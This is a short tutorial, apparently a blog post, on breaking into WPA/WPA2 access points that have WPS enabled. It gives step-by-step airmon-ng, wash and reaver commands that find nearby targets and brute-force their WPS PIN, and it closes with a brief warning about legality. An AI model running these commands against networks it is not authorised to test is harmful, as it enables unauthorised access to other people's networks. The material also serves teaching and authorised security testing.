Wi-Fi Protected Setup (WPS), allows WPA and WPA2 security to be bypassed and effectively broken in many situations. Many access point they have a Wi-Fi Protected Setup enabled by default. We are able to connect to that network using reaver.
Even a WPA/WPA2 protected access point are vulnerable to hackers with wps enabled. WPS – Wi-Fi Protected Setup allows the user to connect to access point using the 8 digit pin number. In this tutorial we will be checking the access point in the nearby location with wps enabled and cracking the pin using reaver.
- Kali Linux Bootable DVD.
- Wireless card (support monitor mode – ALFA AWUS036H)
- Access point with WPA2 and WPS enables
- Desktop or Laptop with DVD drive.
Steps for hacking into the WPA/WPA2 enabled access points with WPS enabled devices
- Boot into the kali Linux
- Open our terminal
- Type “airmon-ng” (Checking all the wireless interfaces connected to the laptop)
- It will list all wireless interfaces connected to the laptop (wlan0 or wlan1).Identify the wireless interface having the monitoring mode capability.
- Type “airmon-ng start wlan0” (We are enabling the monitor mode in the wireless interface)
- Kill all the process which is causing the issues for the monitor mode
- Type “kill “PID NO” to kill the process.
- Type “mkdir /etc/reaver” (Creating the folder for the reaver)
- Type “wash -i mon0 -C” (-C should be capital).It will list all the access points with wps enabled.
10.Type “reaver -i mon0 -b 00:11:22:33:44:55 -c 6 -f -e ssid -a -S -vv” (“-i” name of the monitor-mode interface to use, “-b” BSSID or MAC of the target AP, “-vv” display info about the running verbose, “-c” sets the channel to the target Ap, “-e” ssid name of target AP, “-a” Auto detects best advanced option for the target AP, “-S” uses small DH keys to improve crack speed )
11.It will display the wps pin of the devices after the cracking.The time for the hacking depends on your wireless card.
Notes: Only practice this tutorial on your own lab and your own device. cracking can be a crime in your location.